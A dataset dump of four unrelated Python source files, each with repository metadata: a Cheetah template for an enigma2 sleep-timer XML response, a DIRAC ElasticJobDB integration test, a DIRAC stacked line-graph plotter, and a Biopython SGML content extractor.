    raise AssertionError(
      'This template was compiled with Cheetah version'
      ' %s. Templates compiled before version %s must be recompiled.'%(
         __CHEETAH_version__, RequiredCheetahVersion))
##################################################
## CLASSES
# NOTE: auto-generated by Cheetah from sleeptimer.tmpl — do not hand-edit;
# regenerate from the template instead.
class sleeptimer(Template):
    ##################################################
    ## CHEETAH GENERATED METHODS
    def __init__(self, *args, **KWs):
        super(sleeptimer, self).__init__(*args, **KWs)
        if not self._CHEETAH__instanceInitialized:
            cheetahKWArgs = {}
            allowedKWs = 'searchList namespaces filter filtersLib errorCatcher'.split()
            for k,v in KWs.items():
                if k in allowedKWs: cheetahKWArgs[k] = v
            self._initCheetahInstance(**cheetahKWArgs)
    def respond(self, trans=None):
        ## CHEETAH: main method generated for this template
        # Renders the e2sleeptimer XML document using $enabled, $minutes,
        # $action and $message from the search list, WebSafe-filtered.
        if (not trans and not self._CHEETAH__isBuffering and not callable(self.transaction)):
            trans = self.transaction # is None unless self.awake() was called
        if not trans:
            trans = DummyTransaction()
            _dummyTrans = True
        else: _dummyTrans = False
        write = trans.response().write
        SL = self._CHEETAH__searchList
        _filter = self._CHEETAH__currentFilter
        ########################################
        ## START - generated method body
        _orig_filter_64212376 = _filter
        filterName = u'WebSafe'
        if self._CHEETAH__filters.has_key("WebSafe"):
            _filter = self._CHEETAH__currentFilter = self._CHEETAH__filters[filterName]
        else:
            _filter = self._CHEETAH__currentFilter = \
                self._CHEETAH__filters[filterName] = getattr(self._CHEETAH__filtersLib, filterName)(self).filter
        write(u'''<?xml version="1.0" encoding="UTF-8"?>
<e2sleeptimer>
\t<e2enabled>''')
        _v = VFFSL(SL,"enabled",True) # u'$enabled' on line 4, col 13
        if _v is not None: write(_filter(_v, rawExpr=u'$enabled')) # from line 4, col 13.
        write(u'''</e2enabled>
\t<e2minutes>''')
        _v = VFFSL(SL,"minutes",True) # u'$minutes' on line 5, col 13
        if _v is not None: write(_filter(_v, rawExpr=u'$minutes')) # from line 5, col 13.
        write(u'''</e2minutes>
\t<e2action>''')
        _v = VFFSL(SL,"action",True) # u'$action' on line 6, col 12
        if _v is not None: write(_filter(_v, rawExpr=u'$action')) # from line 6, col 12.
        write(u'''</e2action>
\t<e2text>''')
        _v = VFFSL(SL,"message",True) # u'$message' on line 7, col 10
        if _v is not None: write(_filter(_v, rawExpr=u'$message')) # from line 7, col 10.
        write(u'''</e2text>
</e2sleeptimer>
''')
        _filter = self._CHEETAH__currentFilter = _orig_filter_64212376
        ########################################
        ## END - generated method body
        return _dummyTrans and trans.response().getvalue() or ""
    ##################################################
    ## CHEETAH GENERATED ATTRIBUTES
    _CHEETAH__instanceInitialized = False
    _CHEETAH_version = __CHEETAH_version__
    _CHEETAH_versionTuple = __CHEETAH_versionTuple__
    _CHEETAH_genTime = __CHEETAH_genTime__
    _CHEETAH_genTimestamp = __CHEETAH_genTimestamp__
    _CHEETAH_src = __CHEETAH_src__
    _CHEETAH_srcLastModified = __CHEETAH_srcLastModified__
    _mainCheetahMethod_for_sleeptimer= 'respond'
## END CLASS DEFINITION
# Attach Cheetah's runtime plumbing methods to the generated class once.
if not hasattr(sleeptimer, '_initCheetahAttributes'):
    templateAPIClass = getattr(sleeptimer, '_CHEETAH_templateClass', Template)
    templateAPIClass._addCheetahPlumbingCodeToClass(sleeptimer)
# CHEETAH was developed by Tavis Rudd and Mike Orr
# with code, advice and input from many other volunteers.
# For more information visit http://www.CheetahTemplate.org/
##################################################
## if run from command line:
# Allow rendering the template directly from the command line.
if __name__ == '__main__':
    from Cheetah.TemplateCmdLineIface import CmdLineIface
    CmdLineIface(templateObj=sleeptimer()).run()
|
MOA-2011/enigma2-plugin-extensions-openwebif
|
plugin/controllers/views/web/sleeptimer.py
|
Python
|
gpl-2.0
| 5,628
|
[
"VisIt"
] |
3c43abbc986cbaf6db3be02c4121dd2026fe71f7ee524c9103cb5f9b6be7e1f8
|
""" This tests only need the JobElasticDB, and connects directly to it
"""
import unittest
import time
from DIRAC.Core.Base.Script import parseCommandLine
parseCommandLine()
from DIRAC import gLogger
from DIRAC.WorkloadManagementSystem.DB.ElasticJobDB import ElasticJobDB
class JobDBTestCase(unittest.TestCase):
  """ Base class for the JobElasticDB test cases
  """
  def setUp(self):
    # Each test gets a fresh connection to the Elasticsearch-backed job DB.
    gLogger.setLevel('DEBUG')
    self.jobDB = ElasticJobDB()
  def tearDown(self):
    # NOTE(review): set to False rather than None — presumably just to
    # drop the reference; confirm nothing relies on the distinction.
    self.jobDB = False
class JobParametersCase(JobDBTestCase):
  """ TestJobElasticDB represents a test suite for the JobElasticDB database front-end
  """
  def test_setAndGetJobFromDB(self):
    """
    test_setAndGetJobFromDB tests the functions setJobParameter and getJobParameters in
    WorkloadManagementSystem/DB/JobElasticDB.py
    Test Values:
    100: JobID (int)
    DIRAC: Name (basestring)
    dirac@cern: Value (basestring)
    """
    res = self.jobDB.setJobParameter(100, 'DIRAC', 'dirac@cern')
    self.assertTrue(res['OK'])
    # Elasticsearch indexing is near-real-time; give the write a moment
    # to become visible before querying.
    time.sleep(1)
    res = self.jobDB.getJobParameters(100)
    self.assertTrue(res['OK'])
    self.assertEqual(res['Value']['DIRAC'], 'dirac@cern')
    res = self.jobDB.getJobParametersAndAttributes(100)
    self.assertTrue(res['OK'])
    self.assertEqual(res['Value'][100]['Name'], 'DIRAC')
# Run the integration suite directly (requires a reachable Elasticsearch).
if __name__ == '__main__':
  suite = unittest.defaultTestLoader.loadTestsFromTestCase(JobParametersCase)
  testResult = unittest.TextTestRunner(verbosity=2).run(suite)
|
chaen/DIRAC
|
tests/Integration/WorkloadManagementSystem/Test_ElasticJobDB.py
|
Python
|
gpl-3.0
| 1,491
|
[
"DIRAC"
] |
248a070e77bccd101afbc3a1ddb9c51fb9a3b8a9804c145bbe6ddfc37c349f7e
|
########################################################################
# $HeadURL$
########################################################################
""" LineGraph represents line graphs both simple and stacked. It includes
also cumulative graph functionality.
The DIRAC Graphs package is derived from the GraphTool plotting package of the
CMS/Phedex Project by ... <to be added>
"""
__RCSID__ = "$Id$"
from DIRAC.Core.Utilities.Graphs.PlotBase import PlotBase
from DIRAC.Core.Utilities.Graphs.GraphUtilities import to_timestamp, PrettyDateLocator, \
PrettyDateFormatter, PrettyScalarFormatter
from matplotlib.patches import Polygon
from matplotlib.dates import date2num
import datetime
class LineGraph( PlotBase ):
  """
  The LineGraph class is a straightforward line graph; given a dictionary
  of values, it takes the keys as the independent variable and the values
  as the dependent variable.

  Series are drawn as stacked filled polygons: each label's y values are
  added on top of the running baseline from the previous label.
  """
  def __init__(self,data,ax,prefs,*args,**kw):
    PlotBase.__init__(self,data,ax,prefs,*args,**kw)
  def draw( self ):
    PlotBase.draw(self)
    self.x_formatter_cb(self.ax)
    if self.gdata.isEmpty():
      return None
    tmp_x = []; tmp_y = []
    labels = self.gdata.getLabels()
    nKeys = self.gdata.getNumberOfKeys()
    # tmp_b is the stacking baseline; a tiny positive floor keeps values
    # plottable on a log y axis.
    tmp_b = []
    for n in range(nKeys):
      if 'log_yaxis' in self.prefs:
        tmp_b.append(0.001)
      else:
        tmp_b.append(0.)
    start_plot = 0
    end_plot = 0
    if "starttime" in self.prefs and "endtime" in self.prefs:
      start_plot = date2num( datetime.datetime.fromtimestamp(to_timestamp(self.prefs['starttime'])))
      end_plot = date2num( datetime.datetime.fromtimestamp(to_timestamp(self.prefs['endtime'])))
    self.polygons = []
    # Bottom edge of every polygon: back along y=0 from max key to min key.
    seq_b = [(self.gdata.max_num_key,0.0),(self.gdata.min_num_key,0.0)]
    zorder = 0.0
    labels = self.gdata.getLabels()
    labels.reverse()
    # If it is a simple plot, no labels are used
    # Evaluate the most appropriate color in this case
    if self.gdata.isSimplePlot():
      labels = [('SimplePlot',0.)]
      color = self.prefs.get('plot_color','Default')
      if color.find('#') != -1:
        self.palette.setColor('SimplePlot',color)
      else:
        labels = [(color,0.)]
    for label,num in labels:
      color = self.palette.getColor(label)
      ind = 0
      tmp_x = []
      tmp_y = []
      plot_data = self.gdata.getPlotNumData(label)
      for key, value, error in plot_data:
        if value is None:
          value = 0.
        tmp_x.append( key )
        # Stack this series on top of the accumulated baseline.
        tmp_y.append( float(value)+tmp_b[ind] )
        ind += 1
      # NOTE: zip() returning a list is Python 2 behavior; under Python 3
      # this concatenation would fail.
      seq_t = zip(tmp_x,tmp_y)
      seq = seq_t+seq_b
      poly = Polygon( seq, facecolor=color, fill=True, linewidth=.2, zorder=zorder)
      self.ax.add_patch( poly )
      self.polygons.append( poly )
      # This series' top becomes the next series' baseline; decreasing
      # zorder keeps earlier (taller) polygons behind later ones.
      tmp_b = list(tmp_y)
      zorder -= 0.1
    ymax = max( tmp_b ); ymax *= 1.1
    # NOTE(review): min(tmp_b, 0.) compares the *list* with 0. (a Python 2
    # two-argument min), which always yields 0. — presumably
    # min(min(tmp_b), 0.) was intended; confirm before changing.
    ymin = min( tmp_b, 0. ); ymin *= 1.1
    if 'log_yaxis' in self.prefs:
      ymin = 0.001
    xmax=max(tmp_x)
    if self.log_xaxis:
      xmin = 0.001
    else:
      xmin = 0
    # Explicit axis preferences override the computed limits.
    ymin = self.prefs.get( 'ymin', ymin )
    ymax = self.prefs.get( 'ymax', ymax )
    xmin = self.prefs.get( 'xmin', xmin )
    xmax = self.prefs.get( 'xmax', xmax )
    self.ax.set_xlim( xmin=xmin, xmax=xmax )
    self.ax.set_ylim( ymin=ymin, ymax=ymax )
    if self.gdata.key_type == 'time':
      if start_plot and end_plot:
        self.ax.set_xlim( xmin=start_plot, xmax=end_plot)
      else:
        self.ax.set_xlim( xmin=min(tmp_x), xmax=max(tmp_x))
  def x_formatter_cb( self, ax ):
    # Configure x-axis ticks/formatting based on the key type: categorical
    # string keys get one centered tick per category, time keys get the
    # pretty date locator/formatter, anything else is left untouched.
    if self.gdata.key_type == "string":
      smap = self.gdata.getStringMap()
      reverse_smap = {}
      for key, val in smap.items():
        reverse_smap[val] = key
      ticks = smap.values()
      ticks.sort()
      ax.set_xticks( [i+.5 for i in ticks] )
      ax.set_xticklabels( [reverse_smap[i] for i in ticks] )
      ax.grid( False )
      if self.log_xaxis:
        xmin = 0.001
      else:
        xmin = 0
      ax.set_xlim( xmin=xmin,xmax=len(ticks) )
    elif self.gdata.key_type == "time":
      dl = PrettyDateLocator()
      df = PrettyDateFormatter( dl )
      ax.xaxis.set_major_locator( dl )
      ax.xaxis.set_major_formatter( df )
      ax.xaxis.set_clip_on(False)
      sf = PrettyScalarFormatter( )
      ax.yaxis.set_major_formatter( sf )
    else:
      return None
|
arrabito/DIRAC
|
Core/Utilities/Graphs/LineGraph.py
|
Python
|
gpl-3.0
| 4,402
|
[
"DIRAC"
] |
ac5e76a08710921b142c456cb6066e88cd27e95904f7ecbdc9a0e7515683ff01
|
# Copyright 2002 by Katharine Lindner. All rights reserved.
# This code is part of the Biopython distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
"""Code for more fancy file handles.
Classes:
SGMLExtractorHandle File object that strips tags and returns content from specified
tags blocks.
SGMLExtractor Object that scans for specified SGML tag pairs, removes any inner tags
and returns the raw content.
For example the object SGMLExtractor( [ 'h1' ] )on the following html file would return
'House that Jack built'
SGMLExtractor( [ 'dt' ] ) would return 'ratcatdogcowmaiden'
SGMLExtractor( [ 'dt', 'dd' ] ) would return 'rat that ate the malttcat ate the rat' etc
<h1>House that Jack Built</h1>
<dl>
<dt><big>rat</big></dt>
<dd><big>ate the malt</big></dd>
<dt><big>cat</big></dt>
<dd><big>that ate the rat</big></dd>
<dt><big>dog</big></dt>
<dd><big>that worried the dats</big></dd>
<dt><big>cow</big></dt>
<dd><big>with crumpled horn</big></dd>
<dt><big>maiden</big></dt>
<dd><big>all forlorns</big></dd>
</dl>
"""
import os
import string
import StringIO
import sgmllib
class SGMLExtractorHandle:
    """A file-handle wrapper that strips SGML markup from everything read.

    All reads are delegated to the wrapped handle and the returned data is
    filtered through an SGMLExtractor, so callers receive only the raw text
    found inside the requested tag pairs.
    """

    def __init__(self, handle, tags_of_interest=None):
        """SGMLExtractorHandle(handle, tags_of_interest)

        handle -- file handle to SGML-formatted data.
        tags_of_interest -- list of root names for pairs of start and end
            tags whose content should be kept (default: none).
        """
        # Default changed from a mutable ``[]`` literal to None to avoid the
        # shared-mutable-default pitfall; behaviour for callers is identical.
        self._handle = handle
        self._stripper = SGMLExtractor(tags_of_interest or [])

    def read(self, *args, **keywds):
        """Read from the underlying handle and strip SGML markup."""
        data = self._handle.read(*args, **keywds)
        return self._stripper.strip(data)

    def readline(self, *args, **keywds):
        """Read one line from the underlying handle and strip SGML markup."""
        line = self._handle.readline(*args, **keywds)
        return self._stripper.strip(line)

    def readlines(self, *args, **keywds):
        """Read all lines from the underlying handle, stripping each one."""
        lines = self._handle.readlines(*args, **keywds)
        for i in range(len(lines)):
            # BUG FIX: the original called ``strip(str)`` — stripping the
            # *builtin* ``str`` instead of the line that was just read.
            lines[i] = self._stripper.strip(lines[i])
        return lines

    def __getattr__(self, attr):
        # Delegate anything not defined here (close, seek, ...) to the
        # wrapped handle so this object is a drop-in file replacement.
        return getattr(self._handle, attr)
def is_empty(items):
    """Return 1 when *items* contains no elements, 0 otherwise.

    Kept int-valued (rather than bool) for compatibility with the
    original truth-value convention used elsewhere in this module.
    """
    return 1 if len(items) == 0 else 0
class SGMLExtractor:
    """Scan SGML text for configured tag pairs and collect their raw
    content, discarding all markup (including nested tags).
    """

    class LocalParser(sgmllib.SGMLParser):
        """sgmllib parser that accumulates character data seen while at
        least one tag of interest is currently open.
        """

        def __init__(self, tags_of_interest=None):
            sgmllib.SGMLParser.__init__(self)
            self.data = ''
            # Stack of currently-open tags of interest.
            self._instack = []
            # Tag matching is case-insensitive; normalise once up front.
            # (Mutable ``[]`` default replaced with None — same behaviour.)
            self._tags_of_interest = [tag.lower()
                                      for tag in (tags_of_interest or [])]

        def handle_data(self, data):
            # Keep character data only while inside a tag of interest.
            if not is_empty(self._instack):
                self.data = self.data + data

        def unknown_starttag(self, tag, attrs):
            lower_tag = tag.lower()
            if lower_tag in self._tags_of_interest:
                self._instack.append(lower_tag)

        def unknown_endtag(self, tag):
            if not is_empty(self._instack):
                open_tag = self._instack.pop()
                try:
                    # Push the tag back if this end tag closes something
                    # other than the innermost tag of interest (e.g. a
                    # nested, uninteresting tag).
                    if open_tag != tag.lower():
                        self._instack.append(open_tag)
                except AttributeError:
                    # BUG FIX: was a bare ``except`` with a Python-2-only
                    # ``print`` statement. Only a non-string ``tag`` can
                    # fail here (no ``.lower``), so catch just that.
                    print(tag)

    def __init__(self, tags_of_interest=None):
        self._parser = SGMLExtractor.LocalParser(tags_of_interest or [])

    def strip(self, str):
        """S.strip(str) -> string

        Strip the SGML tags from str, returning only the content of the
        tags of interest.
        """
        if not str:  # empty string, don't do anything.
            return ''
        # I need to make sure that I don't return an empty string if
        # the buffer is not empty. This can happen if there's a newline
        # character embedded within a tag. Thus, I'll first check to
        # see if the last character is a newline. If it is, and it's
        # stripped away, I'll add it back.
        is_newline = str[-1] in ['\n', '\r']
        self._parser.data = ''  # clear the parser's data (don't reset)
        self._parser.feed(str)
        if self._parser.data:
            str = self._parser.data
        elif is_newline:
            str = '\n'
        return str
|
dbmi-pitt/DIKB-Micropublication
|
scripts/mp-scripts/Bio/SGMLExtractor.py
|
Python
|
apache-2.0
| 4,278
|
[
"Biopython"
] |
906b4363315275fbea7db6a3b0a20651b186dd9f9950e679d792337efc3333ee
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.